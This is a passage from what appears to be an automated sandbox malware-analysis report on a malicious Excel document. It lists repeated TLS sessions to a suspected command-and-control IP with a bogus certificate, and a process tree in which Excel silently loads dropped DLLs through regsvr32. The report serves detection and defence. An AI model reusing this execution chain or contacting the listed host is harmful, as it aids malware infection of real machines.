                Jan 13, 2021 16:40:43.006299019 CET221.126.244.72443192.168.2.2249277CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:44.921502113 CET221.126.244.72443192.168.2.2249278CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:47.956825972 CET221.126.244.72443192.168.2.2249283CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:49.870456934 CET221.126.244.72443192.168.2.2249284CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:52.937917948 CET221.126.244.72443192.168.2.2249289CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:54.830255985 CET221.126.244.72443192.168.2.2249290CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:58.046722889 CET221.126.244.72443192.168.2.2249295CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:59.820720911 CET221.126.244.72443192.168.2.2249296CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:03.014342070 CET221.126.244.72443192.168.2.2249301CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:04.848007917 CET221.126.244.72443192.168.2.2249302CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:07.996817112 CET221.126.244.72443192.168.2.2249307CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:09.845252037 CET221.126.244.72443192.168.2.2249308CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:13.039381981 CET221.126.244.72443192.168.2.2249313CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: EXCEL.EXE PID: 2448 Parent PID: 584

                General

                Start time:16:38:41
                Start date:13/01/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fa70000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: regsvr32.exe PID: 2540 Parent PID: 2448

                General

                Start time:16:38:47
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: regsvr32.exe PID: 1100 Parent PID: 2540

                General

                Start time:16:38:47
                Start date:13/01/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
                Imagebase:0xf70000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Analysis Process: regsvr32.exe PID: 1296 Parent PID: 2448

                General

                Start time:16:38:50
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: regsvr32.exe PID: 2808 Parent PID: 1296

                General

                Start time:16:38:50
                Start date:13/01/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
                Imagebase:0xf70000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Analysis Process: regsvr32.exe PID: 2832 Parent PID: 2448

                General

                Start time:16:38:54
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >